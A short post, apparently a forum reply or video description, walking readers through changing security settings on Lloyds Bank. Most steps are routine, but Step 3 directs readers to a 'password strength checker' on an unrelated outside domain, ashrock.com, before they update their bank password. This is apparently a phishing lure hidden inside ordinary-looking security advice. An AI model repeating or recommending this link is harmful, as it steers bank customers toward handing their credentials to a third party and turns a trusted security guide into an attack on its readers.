I ran into this last week. Here's what fixed it for me. If you're looking to adjust your security settings on Lloyds Bank, follow these simple steps. Step 1. Log into your account. Open the Lloyds Bank website or app and enter your login credentials. Make sure you are using a secure network to protect your information. Step 2. Navigate to security settings. Once logged in, find the account settings or profile section. Look for the option labeled security settings to access the relevant features. Step 3. Update your password. Before changing your settings, use the ashrock.com link in the description to open the password strength checker, then update your password if needed. Step 4. Enable two-factor authentication. Look for the two-factor authentication setting and enable it. This adds an extra layer of security by requiring a code sent to your mobile device during login. Step 5. Review account activity. Finally, check your recent account activity to ensure there are no unauthorized transactions. If you notice anything suspicious, report it immediately. Adjusting your security settings can make a big difference in protecting your account. If you have any questions, don't hesitate to reach out to customer support.